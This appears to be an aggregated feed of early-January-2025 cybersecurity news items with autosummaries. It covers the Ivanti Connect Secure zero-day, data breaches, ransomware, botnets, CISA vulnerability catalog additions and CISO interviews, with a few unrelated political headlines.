    Autosummary: An investigation showed that the exposed files contained information that varied per patient but could have included the patient’s name and one or more of the following:
    - Social Security number (SSN)
    - Driver’s license number
    - Date of birth
    - The services received and the dates of service
    - Insurance information
    - Treating provider
    - Treatment and/or diagnostic information
    While BayMark did not provide any information about the number of victims or the nature of the incident, it has been separately reported that the RansomHub ransomware group has BayMark listed on their leak site.


    GitLab CISO on proactive monitoring and metrics for DevSecOps success

    industry
    2025-01-09 https://www.helpnetsecurity.com/2025/01/09/josh-lemos-gitlab-devsecops-success/

    In this Help Net Security interview, Josh Lemos, CISO at GitLab, talks about the shift from DevOps to DevSecOps, focusing on the complexity of building systems and integrating security tools. He shares tips for maintaining development speed, fostering collaboration, and using metrics to track DevSecOps success. What are organizations’ most significant challenges when shifting from DevOps to DevSecOps? The complexity of organizations’ build processes and developer ecosystems is a significant challenge for those seeking to … More

    The post GitLab CISO on proactive monitoring and metrics for DevSecOps success appeared first on Help Net Security.


    Autosummary: Organizations should take steps to ease the implementation of security into their systems to avoid complexity from suboptimal design decisions, such as difficult-to-maintain code and redundant dependencies, which can create a larger attack surface and generate more security scan findings for teams to sort through, prioritize, and address. While developers in DevOps may deploy code dozens or hundreds of times a day, scanners, for example static application security testing (SAST) tools, often run on a scheduled basis, leading to delays in feedback loops. In this Help Net Security interview, Josh Lemos, CISO at GitLab, talks about the shift from DevOps to DevSecOps, focusing on the complexity of building systems and integrating security tools.


    Cybersecurity in 2025: Global conflict, grown-up AI, and the wisdom of the crowd

    ciber
    2025-01-09 https://www.helpnetsecurity.com/2025/01/09/2025-cybersecurity-community/

    As we look ahead to cybersecurity developments in 2025, there’s bad news and good—expect to see new challenging attacks and the cybersecurity community increasingly working together to counter threats that are beyond the scope of individual organizations.

    The post Cybersecurity in 2025: Global conflict, grown-up AI, and the wisdom of the crowd appeared first on Help Net Security.


    Autosummary: AI as a tool, a target, and a threat: In 2025, expect the AI hype to subside, some real-world use cases of generative AI to start emerging, and AI security and safety to mature significantly. CISOs, and the organizations they serve, will increasingly need to take a wider view to ensure robust cybersecurity, putting greater focus on the security of every component of their supply chains.


    Ivanti Flaw CVE-2025-0282 Actively Exploited, Impacts Connect Secure and Policy Secure

    exploits
    2025-01-09 https://thehackernews.com/2025/01/ivanti-flaw-cve-2025-0282-actively.html
    Ivanti is warning that a critical security flaw impacting Ivanti Connect Secure, Policy Secure, and ZTA Gateways has come under active exploitation in the wild beginning mid-December 2024. The security vulnerability in question is CVE-2025-0282 (CVSS score: 9.0), a stack-based buffer overflow that affects Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2

    Autosummary: Some of the other post-exploitation activities carried out are listed below:
    - Perform internal network reconnaissance using built-in tools like nmap and dig
    - Use the LDAP service account to perform LDAP queries and move laterally within the network, including Active Directory servers, through SMB or RDP
    - Steal application cache database containing information associated with VPN sessions, session cookies, API keys, certificates, and credential material
    - Deploy a Python script named DRYHOOK to harvest credentials
    Mandiant also cautioned that it’s possible multiple hacking groups are responsible for the creation and deployment of SPAWN, DRYHOOK, and PHASEJAM, but noted it doesn’t have enough data to accurately estimate the number of threat actors targeting the flaw.


    Wireshark 4.4.3 released: Updated protocol support, bug fixes

    exploits
    2025-01-09 https://www.helpnetsecurity.com/2025/01/09/wireshark-4-4-3-released/

    Wireshark, the popular network protocol analyzer, has reached version 4.4.3. Wireshark offers deep inspection across hundreds of protocols, live and offline analysis, and display filters. With multi-platform support, VoIP analysis, and capture file compatibility, it’s perfect for professionals seeking intuitive GUI or TTY-mode network troubleshooting and analysis capabilities. Wireshark 4.4.3 bug fixes Potential mismatch in GSM MAP dissector for uncertainty radius and filter key. Macro eNodeB ID and Extended Macro eNodeB ID not decoded by … More

    The post Wireshark 4.4.3 released: Updated protocol support, bug fixes appeared first on Help Net Security.


    Autosummary: PER, BACapp, BBLog, BT BR/EDR RF, CQL, Diameter, DOF, ECMP, FiveCo RAP, FTDI FT, GSM COMMON, GTPv2, HCI_MON, HSRP, HTTP2, ICMPv6, IEEE 802.11, Kafka, LTE RRC, MBIM, MMS, Modbus/TCP, MPEG PES, NAS-EPS, NFS, NGAP, NR RRC, PLDM, PN-DCP, POP, ProtoBuf, PTP, RLC, RPC, RTCP, sFlow, SIP, SRT, TCP, UCP, USBCCID, Wi-SUN, and ZigBee ZCL. Wireshark is available for free download here.


    Microsoft fixes bug causing Outlook freezes when copying text

    exploits
    2025-01-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-causing-outlook-freezes-when-copying-text/
    Microsoft has fixed a known issue causing the classic Outlook email client to stop responding when copying text with the CTRL+C keyboard shortcut. [...]



    Ivanti Connect Secure zero-day exploited since mid-December (CVE-2025-0282)

    exploits
    2025-01-09 https://www.helpnetsecurity.com/2025/01/09/ivanti-cve-2025-0282-zero-day-attacks-indicators-of-compromise/

    The zero-day attacks leveraging the Ivanti Connect Secure (ICS) vulnerability (CVE-2025-0282) made public on Wednesday were first spotted in mid-December 2024, Mandiant researchers have shared. It’s still impossible to say whether they were mounted by a single threat actor, but the use of known malware on at least one of the compromised VPN appliances points to China-nexus espionage actor(s) – UNC5337 and UNC5221 – that have exploited ICS zero-days several times in the past few … More

    The post Ivanti Connect Secure zero-day exploited since mid-December (CVE-2025-0282) appeared first on Help Net Security.


    Autosummary: Exploitation of the vulnerability generally followed these steps: Disable SELinux -> Prevent syslog forwarding -> Remount the drive as read-write -> Write and execute the script -> Deploy web shell(s) -> Remove specific log entries from debug and application logs -> Reenable SELinux -> Remount the drive.


    MirrorFace Leverages ANEL and NOOPDOOR in Multi-Year Cyberattacks on Japan

    ciber
    2025-01-09 https://thehackernews.com/2025/01/mirrorface-leverages-anel-and-noopdoor.html
    Japan’s National Police Agency (NPA) and National Center of Incident Readiness and Strategy for Cybersecurity (NCSC) accused a China-linked threat actor named MirrorFace of orchestrating a persistent attack campaign targeting organizations, businesses, and individuals in the country since 2019. The primary objective of the attack campaign is to steal information related to Japan’s national



    U.S. CISA adds Ivanti Connect Secure, Policy Secure, and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-09 https://securityaffairs.com/172857/hacking/u-s-cisa-adds-ivanti-connect-secure-policy-secure-and-zta-gateways-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Connect Secure, Policy Secure, and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Ivanti Connect Secure Vulnerability, tracked as CVE-2025-0282 (CVSS score: 9.0) to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability Ivanti impacted Ivanti Connect […]

    Autosummary: Pierluigi Paganini, January 09, 2025. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Connect Secure, Policy Secure, and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog.


    Microsoft fixes OneDrive bug causing macOS app freezes

    exploits
    2025-01-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-onedrive-bug-causing-macos-app-freezes/
    Microsoft has fixed a known issue causing macOS applications to freeze when opening or saving files in OneDrive. [...]

    Autosummary: Until they upgrade, customers are advised to force quit the OpenAndSavePanelService process that hangs because of this issue and save files to a location other than their Desktop, Documents, or OneDrive folders.


    US Treasury hack linked to Silk Typhoon Chinese state hackers

    government
    2025-01-09 https://www.bleepingcomputer.com/news/security/us-treasury-hack-linked-to-silk-typhoon-chinese-state-hackers/
    Chinese state-backed hackers, tracked as Silk Typhoon, have been linked to the U.S. Office of Foreign Assets Control (OFAC) hack in early December. [...]

    Autosummary: Silk Typhoon (also known as Hafnium) is a Chinese nation-state hacking group known for attacking a wide range of targets in the United States, Australia, Japan, and Vietnam, including defense contractors, policy think tanks, and non-governmental organizations (NGOs) as well as healthcare, law firms, and higher education organizations.


    Google: Chinese hackers likely behind Ivanti VPN zero-day attacks

    exploits
    2025-01-09 https://www.bleepingcomputer.com/news/security/google-chinese-hackers-likely-behind-ivanti-vpn-zero-day-attacks/
    Hackers exploiting the critical Ivanti Connect Secure zero-day vulnerability disclosed yesterday installed on compromised VPN appliances new malware called "Dryhook" and "Phasejam" that is not currently associated with any threat group. [...]

    Autosummary: The attackers also install ‘Spawn’ tools like Spawnmole (tunneler), Spawnsnail (SSH backdoor), and Spawnsloth (log tampering utility), which, unlike the Phasejam web shell, can persist across system upgrades.


    Criminal IP: Bringing Real-Time Phishing Detection to Microsoft Outlook

    financial
    2025-01-09 https://www.bleepingcomputer.com/news/security/criminal-ip-bringing-real-time-phishing-detection-to-microsoft-outlook/
    AI SPERA announced today that it launched its Criminal IP Malicious Link Detector add-in on the Microsoft Marketplace. Learn more about how this tool provides real-time phishing email detection and URL blocking for Microsoft Outlook. [...]

    Autosummary: AI SPERA’s "Criminal IP" has recently entered the marketplace of major US data warehousing platforms, including Amazon Web Services (AWS), Microsoft Azure, and Snowflake, expanding its global reach for threat data.


    Microsoft fixes bug causing Outlook to freeze when copying text

    exploits
    2025-01-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-causing-outlook-to-freeze-when-copying-text/
    Microsoft has fixed a known issue causing the classic Outlook email client to stop responding when copying text with the CTRL+C keyboard shortcut. [...]



    Google Chrome AI extensions deliver info-stealing malware in broad attack

    exploits
    2025-01-09 https://www.malwarebytes.com/blog/news/2025/01/google-chrome-ai-extensions-deliver-info-stealing-malware-in-broad-attack
    At least 36 Google Chrome extensions for AI and VPN tools have begun delivering info-stealing malware in a widespread attack.

    Autosummary: The compromised extensions include “Bard AI Chat,” “ChatGPT for Google Meet,” “ChatGPT App,” “ChatGPT Quick Access,” “VPNCity,” “Internxt VPN,” and more, which are used by an estimated total of 2.6 million people.


    Space Bears ransomware: what you need to know

    exploits ransomware
    2025-01-09 https://www.tripwire.com/state-of-security/space-bears-ransomware-what-you-need-know
    The Space Bears ransomware gang stands out from the crowd by presenting itself better than many legitimate companies, with corporate stock images and a professional-looking leak site. Read more in my article on the Tripwire State of Security blog.

    Autosummary: [Image] Guarantees after the transaction:
    - Your publication will be deleted from this site
    - All downloaded information, confidential data, personal data, databases will be deleted from the servers
    - Tools to decrypt your system will be provided if necessary
    - We will give you information on how to avoid similar attacks in the future
    The gang, which is aligned to the Phobos ransomware-as-a-service group, steals sensitive data from organisations, encrypts victims’ computer systems, and demands that a ransom be paid for a decryption key or the data will be published on the dark web.


    Banshee Stealer variant targets Russian-speaking macOS users

    rusia-ucrania
    2025-01-09 https://www.helpnetsecurity.com/2025/01/09/banshee-stealer-variant-targets-russian-speaking-macos-users/

    The Banshee Stealer is a stealthy threat to the rising number of macOS users around the world, including those in Russian-speaking countries, according to Check Point researcher Antonis Terefos. Banshee Stealer was first publicly profiled in August 2024, a month after its developer began selling it as-a-Service for the high price of $3,000 per month. The malware is capable of functioning across both macOS x86_64 and ARM64 architectures, and can capture / steal credentials and … More

    The post Banshee Stealer variant targets Russian-speaking macOS users appeared first on Help Net Security.


    Autosummary: But even after the leak, the threat persists: Check Point has identified multiple campaigns still distributing the malware through phishing websites, ostensibly offering popular software (Telegram, TradingView, Parallels, etc.) for download.


    Ukrainian Cyber Alliance destroyed the connectivity of Russian ISP Nodex

    rusia-ucrania
    2025-01-09 https://securityaffairs.com/172864/hacktivism/ukrainian-cyber-alliance-destroyed-russian-isp-nodex.html
    A group of hacktivists, known as the Ukrainian Cyber Alliance, breached Russian ISP Nodex, stole sensitive documents, and wiped systems. Ukrainian Cyber Alliance hacked Russian ISP Nodex, stole sensitive data, and wiped systems, highlighting their cyberattack capabilities. The Ukrainian Cyber Alliance has been active since 2016; the pro-Ukraine group has targeted Russian entities since the […]

    Autosummary: Pierluigi Paganini, January 09, 2025. A group of hacktivists, known as the Ukrainian Cyber Alliance, breached Russian ISP Nodex, stole sensitive documents, and wiped systems.


    Politics content to be pushed on all Instagram and Threads users

    industry
    2025-01-09 https://www.bbc.com/news/articles/clyjyd0297go
    Users will no longer be able to opt out of political content from people they do not follow.



    Largest US addiction treatment provider notifies patients of data breach

    financial
    2025-01-09 https://www.bleepingcomputer.com/news/security/largest-us-addiction-treatment-provider-notifies-patients-of-data-breach/
    BayMark Health Services, North America’s largest provider of substance use disorder (SUD) treatment and recovery services, is notifying an undisclosed number of patients that attackers stole their personal and health information in a September 2024 breach. [...]

    Autosummary: Documents exposed during the incident contained various types of data for each affected patient, including their names and: Social Security number, driver’s license number, date of birth, services received and dates of service, insurance information, treating provider and treatment and/or diagnostic information.


    The top target for phishing campaigns

    financial
    2025-01-08 https://www.helpnetsecurity.com/2025/01/08/genai-apps-phishing/

    Despite organizations’ repeated attempts at security awareness training, with a particular emphasis on how employees can avoid being phished, in 2024 enterprise users clicked on phishing lures at a rate nearly three times higher than in 2023, according to Netskope. More than eight out of every 1,000 users clicked on a phishing link each month – up 190% from last year when fewer than three per thousand enterprise users fell prey to phishing attempts. Where … More

    The post The top target for phishing campaigns appeared first on Help Net Security.


    Autosummary: Sensitive data being leaked through personal apps is top of mind for most organizations, with the most common type of data policy violation being for regulated data (60%), which included personal, financial, or healthcare data being uploaded to personal apps. In 2024, 88% of all employees used personal cloud apps each month, with 26% uploading, posting, or otherwise sending data to personal apps.


    Cybersecurity jobs available right now: January 8, 2025

    ciber
    2025-01-08 https://www.helpnetsecurity.com/2025/01/08/cybersecurity-jobs-available-right-now-january-8-2025/

    AI Penetration Tester Microsoft | Canada | Remote – View job details As an AI Penetration Tester, you will discover and exploit vulnerabilities end-to-end in order to assess the security of AI systems. Execute offensive operations on production AI systems using real world adversarial tactics and techniques to identify failures. Develop tools and techniques to scale and accelerate offensive emulation and vulnerability discovery specific for AI systems. Application Security Engineer Emerson | India | Hybrid … More

    The post Cybersecurity jobs available right now: January 8, 2025 appeared first on Help Net Security.


    Autosummary:
    Information Security Specialist – Red Team Operator TD | Canada | Hybrid – View job details: As an Information Security Specialist – Red Team Operator, you will define, develop, implement, and manage standards, policies, procedures, and solutions that mitigate risk and maximize security, availability of service, efficiency and effectiveness.
    Application Security Engineer Emerson | India | Hybrid – View job details: As an Application Security Engineer, your responsibilities will include analyzing UML diagrams, DFDs, and threat models for security flaws while providing detailed recommendations for software and system setups to address them, mentoring developers on security topics and secure coding practices, developing and delivering security training for developers and management, analyzing requirements and conducting code reviews to identify security flaws, and establishing direction for security requirements in custom hardware and software.
    Senior Manager, Global Incident Response Experian | USA | Remote – View job details: As a Senior Manager, Global Incident Response, you will develop and grow the Advanced Response team’s processes, capabilities, and overarching strategy to contribute to an overall increase in incident response effectiveness at Experian.
    IT Security Engineer Alpitronic | Italy | On-site – View job details: As an IT Security Engineer, you will perform risk assessment analysis, by identifying vulnerabilities that could be exploited by malicious attackers, to proactively anticipate and prevent cyber-attacks.


    CISA Flags Critical Flaws in Mitel and Oracle Systems Amid Active Exploitation

    exploits
    2025-01-08 https://thehackernews.com/2025/01/cisa-flags-critical-flaws-in-mitel-and.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added three flaws impacting Mitel MiCollab and Oracle WebLogic Server to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is as follows - CVE-2024-41713 (CVSS score: 9.1) - A path traversal vulnerability in Mitel MiCollab that could allow an attacker



    Mirai Botnet Variant Exploits Four-Faith Router Vulnerability for DDoS Attacks

    exploits
    2025-01-08 https://thehackernews.com/2025/01/mirai-botnet-variant-exploits-four.html
    A Mirai botnet variant has been found exploiting a newly disclosed security flaw impacting Four-Faith industrial routers since early November 2024 with the goal of conducting distributed denial-of-service (DDoS) attacks. The botnet maintains approximately 15,000 daily active IP addresses, with the infections primarily scattered across China, Iran, Russia, Turkey, and the United States.

    Autosummary: Some of the other security flaws exploited by the botnet to extend its reach and scale include CVE-2013-3307, CVE-2013-7471, CVE-2014-8361, CVE-2016-20016, CVE-2017-17215, CVE-2017-5259, CVE-2020-25499, CVE-2020-9054, CVE-2021-35394, CVE-2023-26801, CVE-2024-8956, and CVE-2024-8957.


    FCC Launches "Cyber Trust Mark" for IoT Devices to Certify Security Compliance

    industry
    2025-01-08 https://thehackernews.com/2025/01/fcc-launches-cyber-trust-mark-for-iot.html
    The U.S. government on Tuesday announced the launch of the U.S. Cyber Trust Mark, a new cybersecurity safety label for Internet-of-Things (IoT) consumer devices. "IoT products can be susceptible to a range of security vulnerabilities," the U.S. Federal Communications Commission (FCC) said. "Under this program, qualifying consumer smart products that meet robust cybersecurity standards will bear



    U.S. CISA adds Oracle WebLogic Server and Mitel MiCollab flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-08 https://securityaffairs.com/172783/security/u-s-cisa-adds-oracle-weblogic-server-mitel-micollab-flaws-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Oracle WebLogic Server and Mitel MiCollab flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Oracle WebLogic Server and Mitel MiCollab vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for the vulnerabilities added to the catalog: […]

    Autosummary: Below are the descriptions for the vulnerabilities added to the catalog: CVE-2020-2883 (CVSS score 9.8) is a vulnerability in Oracle WebLogic Server (versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0).


    Trump ramps up threats to gain control of Greenland and Panama Canal

    latam
    2025-01-08 https://www.bbc.com/news/articles/c4gzn48jwz2o
    The president-elect said he would not rule out the use of military force to seize control of the Panama Canal and Greenland.

    Autosummary: [Video: Danish PM says "Greenland is for the Greenlandic people"] Trump also vowed to use "economic force" when asked if he would attempt to annex Canada and called their shared border an "artificially drawn line". Among other things, he suggested renaming the Gulf of Mexico the "Gulf of America" and restated his opposition to wind power, saying wind turbines are "driving the whales crazy".


    Mitel MiCollab, Oracle WebLogic Server vulnerabilities exploited by attackers

    exploits
    2025-01-08 https://www.helpnetsecurity.com/2025/01/08/mitel-micollab-oracle-weblogic-server-vulnerabilities-exploited-by-attackers/

    CISA has added Mitel MiCollab (CVE-2024-41713, CVE-2024-55550) and Oracle WebLogic Server (CVE-2020-2883) vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The Mitel MiCollab vulnerabilities exploited Mitel MiCollab is a popular enterprise collaboration suite. CVE-2024-41713 and CVE-2024-55550 are both path traversal vulnerabilities. The former is exploitable without authentication, and may allow an attacker to gain access “to provisioning information including non-sensitive user and network information and perform unauthorized administrative actions on the MiCollab Server.” The latter … More

    The post Mitel MiCollab, Oracle WebLogic Server vulnerabilities exploited by attackers appeared first on Help Net Security.


    Autosummary: In this latest KEV update, CISA has also urged users and administrators to review threat briefs and security bulletins related to CVE-2024-0012 and CVE-2024-9474, two vulnerabilities in Palo Alto Networks firewalls that have been exploited (as zero-days) by attackers in November 2024.


    Top 5 Malware Threats to Prepare Against in 2025

    exploits
    2025-01-08 https://thehackernews.com/2025/01/top-5-malware-threats-to-prepare.html
    2024 had its fair share of high-profile cyber attacks, with companies as big as Dell and TicketMaster falling victim to data breaches and other infrastructure compromises. In 2025, this trend will continue. So, to be prepared for any kind of malware attack, every organization needs to know its cyber enemy in advance. Here are 5 common malware families that you can start preparing to counter

    Autosummary: Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, etc. It can secretly record a victim’s screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch attacks that overwhelm targeted websites. First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data. Analysis of an XWorm attack: Phishing emails are often the initial stage of XWorm attacks. In this attack, we can see the original phishing email, which features a link to a Google Drive.


    Panama Canal will stay in our hands, minister tells Trump

    latam
    2025-01-08 https://www.bbc.com/news/articles/c79191d9xreo
    Panama says the canal’s sovereignty is "non-negotiable" after Trump refuses to rule out military force to seize it.

    Autosummary: Pressed by journalists on whether he would rule out using military or economic force to acquire Greenland and the Panama Canal, he said: "No, I can’t assure you on either of those two." Panama’s foreign minister denied his country had received any kind of offer from the president-elect.


    Ivanti warns of new Connect Secure flaw used in zero-day attacks

    exploits
    2025-01-08 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-new-connect-secure-flaw-used-in-zero-day-attacks/
    Ivanti is warning that a new Connect Secure remote code execution vulnerability tracked as CVE-2025-0282 was exploited in zero-day attacks to install malware on appliances. [...] "

    Autosummary: CVE-2025-0282 is a critical (9.0) stack-based buffer overflow bug in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows an unauthenticated attacker to remotely execute code on devices.


    Russian ISP confirms Ukrainian hackers "destroyed" its network

    rusia-ucrania
    2025-01-08 https://www.bleepingcomputer.com/news/security/russian-isp-confirms-ukrainian-hackers-destroyed-its-network/
    Russian internet service provider Nodex confirmed on Tuesday that its network was "destroyed" in a cyberattack claimed by Ukrainian hacktivists who are part of the Ukrainian Cyber Alliance [...]

    Autosummary: Since then, UCA cyber activists have claimed many breaches impacting various Russian organizations, including the Russian Ministry of Defense, Commonwealth of Independent States Institute (financed by the Russian state company Gazprom), the Donetsk People's Republic's Ministry of Coal and Energy, Vladimir Putin's political adviser Vladislav Surkov, and multiple Russian military officers and media outlets, among others.


    SonicWall urges admins to patch exploitable SSLVPN bug immediately

    exploits
    2025-01-08 https://www.bleepingcomputer.com/news/security/sonicwall-urges-admins-to-patch-exploitable-sslvpn-bug-immediately/
    SonicWall is emailing customers urging them to upgrade their firewall's SonicOS firmware to patch an authentication bypass vulnerability in SSL VPN and SSH management that is "susceptible to actual exploitation." [...]

    Autosummary: A SonicWall security bulletin tracks this flaw as CVE-2024-53704 (CVSS v3.0 score: 8.2, "high"), stating it impacts multiple generation six and generation seven firewalls, running 6.5.4.15-117n and older and 7.0.1-5161 and older versions.


    Hackers exploit KerioControl firewall flaw to steal admin CSRF tokens

    exploits
    2025-01-08 https://www.bleepingcomputer.com/news/security/hackers-exploit-keriocontrol-firewall-flaw-to-steal-admin-csrf-tokens/
    Hackers are trying to exploit CVE-2024-52875, a critical CRLF injection vulnerability that leads to 1-click remote code execution (RCE) attacks in the GFI KerioControl firewall product. [...]



    Ivanti Connect Secure zero-day exploited by attackers (CVE-2025-0282)

    exploits
    2025-01-08 https://www.helpnetsecurity.com/2025/01/08/ivanti-exploited-connect-secure-zero-day-cve-2025-0282-cve-2025-0283/

    Ivanti has fixed two vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, one of which (CVE-2025-0282) has been exploited as a zero-day by attackers to compromise Connect Secure VPN appliances. About CVE-2025-0282 and CVE-2025-0283: Both are stack-based buffer overflow issues: CVE-2025-0282 allows for unauthenticated remote code execution, CVE-2025-0283 can be used by a local authenticated attacker to escalate their privileges. Ivanti says that a “limited number” of customers’ Ivanti Connect Secure appliances have … More



    Gayfemboy Botnet targets Four-Faith router vulnerability

    exploits
    2025-01-08 https://securityaffairs.com/172805/malware/gayfemboy-mirai-botnet-four-faith-flaw.html
    Gayfemboy, a Mirai botnet variant, has been exploiting a flaw in Four-Faith industrial routers to launch DDoS attacks since November 2024. The Gayfemboy botnet was first identified in February 2024; it borrows the code from the basic Mirai variant and now integrates N-day and 0-day exploits. By November 2024, Gayfemboy exploited 0-day vulnerabilities in Four-Faith […]

    Autosummary: Gayfemboy exploits various vulnerabilities, including CVE-2013-3307, CVE-2021-35394, CVE-2024-8957, and others in DVRs, routers, and security appliances. (Pierluigi Paganini, January 08, 2025)


    SonicWall warns of an exploitable SonicOS vulnerability

    exploits
    2025-01-08 https://securityaffairs.com/172823/security/sonicwall-sonicos-authentication-bypass-flaw.html
    SonicWall warns customers to address an authentication bypass vulnerability in its firewall’s SonicOS that is “susceptible to actual exploitation.” SonicWall is urging customers to upgrade the SonicOS firmware of their firewalls to patch an authentication bypass vulnerability tracked as CVE-2024-53704 (CVSS score of 8.2). The vulnerability resides in SSL VPN and SSH management and according […]

    Autosummary: “We have identified a high (CVE Score 8.2) firewall vulnerability that is susceptible to actual exploitation for customers with SSL VPN or SSH management enabled and that should be mitigated immediately by upgrading to the latest firmware, which will be web-posted tomorrow, Jan 7th, 2025.”


    eBay CISO on managing long-term cybersecurity planning and ROI

    ciber
    2025-01-07 https://www.helpnetsecurity.com/2025/01/07/sean-embry-ebay-enterprise-cybersecurity-planning/

    In this Help Net Security interview, Sean Embry, CISO at eBay, discusses key aspects of cybersecurity leadership. He shares insights on balancing long-term strategic planning with immediate threat response, evaluating the ROI of new technologies, and addressing employee cybersecurity fatigue. As a CISO, how do you balance long-term strategic cybersecurity investments with immediate tactical threat response? The most important word here is “balance”, and effective cybersecurity programs need to have a longer-term strategy but be … More


    Autosummary: They need to form a broad communications base within the company to understand the state of security and compliance across the entire enterprise (that means hygiene, controls, access, platform security, perimeter security, etc.) and what the business strategy or new high-priority efforts are (e.g. Agentic GPT). It’s this shared understanding and support that helps us prevent fatigue, and we utilize several mechanisms to ensure our teams are included in our plans: We have virtual architecture teams with representation from all of the technology domains where we review the architecture and engineering behind new tools or policies (scalability, access management, compute impact, etc.).


    McAfee Scam Detector spots scams across text, email, and video

    financial
    2025-01-07 https://www.helpnetsecurity.com/2025/01/07/mcafee-scam-detector/

    McAfee launched the AI-powered McAfee Scam Detector — a tool designed to protect against text, email, and video scams. Today’s scams are smarter, sneakier, and more convincing than ever — and they’re everywhere. 59% of Americans say they or someone they know has fallen for an online scam in the last 12 months, with scam victims losing an average of $1,471. The rise of deepfakes and ease of access to the AI tools to create … More


    Autosummary: That’s where McAfee Scam Detector comes in, giving control back to consumers and stopping scammers in their tracks with proactive, real-time protection against suspicious texts, fake emails, and deepfake videos that look incredibly real — all cleverly designed by scammers to steal people’s money and personal information. Every day, scammers trick people with fake texts, emails, and videos, and the results can be devastating. Simple notifications: Alerts come in the form of unobtrusive notifications, whether via your mobile app, email inbox, or video platform, to ensure you know what’s suspicious and why.


    New EAGERBEE Variant Targets ISPs and Governments with Advanced Backdoor Capabilities

    government
    2025-01-07 https://thehackernews.com/2025/01/new-eagerbee-variant-targets-isps-and.html
    Internet service providers (ISPs) and governmental entities in the Middle East have been targeted using an updated variant of the EAGERBEE malware framework. The new variant of EAGERBEE (aka Thumtais) comes fitted with various components that allow the backdoor to deploy additional payloads, enumerate file systems, and execute command shells, demonstrating a significant evolution. "The key

    Autosummary: The server subsequently responds with a Plugin Orchestrator that, in addition to reporting system-related information to the server (e.g., NetBIOS name of the domain; physical and virtual memory usage; and system locale and time zone settings), harvests details about running processes and awaits further instructions: receive and inject plugins into memory; unload a specific plugin from memory and remove the plugin from the list; remove all plugins from the list; check if the plugin is loaded or not. "All the plugins are responsible for receiving and executing commands from the orchestrator," the researchers said, adding they perform file operations, manage processes, maintain remote connections, manage system services, and list network connections.


    UN aviation agency investigating possible data breach

    financial
    2025-01-07 https://www.helpnetsecurity.com/2025/01/07/icao-un-aviation-agency-data-breach-security-incident/

    The United Nations’ International Civil Aviation Organization (ICAO) confirmed on Monday that it’s “actively investigating reports of a potential information security incident allegedly linked to a threat actor known for targeting international organizations.” The statement came a few days after 42,000 documents allegedly stolen from the organization had been offered for sale on an underground forum. The forum user, who goes by Natohub, claims that the stolen documents contain user data: first and last name, … More



    Farewell to the Fallen: The Cybersecurity Stars We Lost Last Year

    ciber
    2025-01-07 https://thehackernews.com/2025/01/farewell-to-fallen-cybersecurity-stars.html
    It's time once again to pay our respects to the once-famous cybersecurity solutions whose usefulness died in the past year. The cybercriminal world collectively mourns the loss of these solutions and the easy access they provide to victim organizations. These solutions, though celebrated in their prime, succumbed to the twin forces of time and advancing threats. Much like a tribute to

    Autosummary: Legacy Multi-Factor Authentication (MFA). Cause of Death: Compromised by sophisticated phishing, man-in-the-middle (MitM), SIM-swapping, and MFA prompt bombing attacks. The Role of FIDO2 and Phishing-Resistant Authentication: In place of legacy MFA, phishing-resistant, FIDO2-compliant solutions have emerged as the gold standard for authentication, driving the industry toward a passwordless future. These solutions deliver adaptive, context-aware security, and integrate biometrics, hardware security keys, and passwordless technologies to provide unparalleled user convenience and resilience against evolving threats. Additionally, passwordless solutions integrate seamlessly with identity and access management (IAM) systems, creating a unified approach to authentication, lifecycle management, and compliance monitoring.


    Moxa router flaws pose serious risks to industrial environments

    industry
    2025-01-07 https://securityaffairs.com/172770/ics-scada/moxa-router-flaws-risks-to-industrial-environmets.html
    Moxa warns of two flaws in its routers and security appliances that enable privilege escalation and remote command execution. Moxa addressed privilege escalation and OS command injection vulnerabilities in cellular routers, secure routers, and network security appliances. Below are the descriptions for both vulnerabilities: Moxa released firmware updates to address vulnerabilities CVE-2024-9140 and CVE-2024-9138. Affected […]



    CISA warns of critical Oracle, Mitel flaws exploited in attacks

    exploits
    2025-01-07 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-oracle-mitel-flaws-exploited-in-attacks/
    CISA has warned U.S. federal agencies to secure their systems against critical vulnerabilities in Oracle WebLogic Server and Mitel MiCollab systems that are actively exploited in attacks. [...]



    Washington state sues T-Mobile over 2021 data breach security failures

    financial government
    2025-01-07 https://www.bleepingcomputer.com/news/legal/washington-state-sues-t-mobile-over-2021-data-breach-security-failures/
    Washington state has sued T-Mobile over failing to secure the sensitive personal information of over 2 million Washington residents in a 2021 data breach. [...]

    Autosummary: BleepingComputer has contacted T-Mobile requesting a statement on the Washington AG lawsuit, and a spokesperson sent us the following comment: "We have had multiple conversations about this incident from 2021 with the Washington AG's office over the last several years and even reached out in late November to continue discussions, so the office's decision to file a lawsuit yesterday came as a surprise," T-Mobile told BleepingComputer.


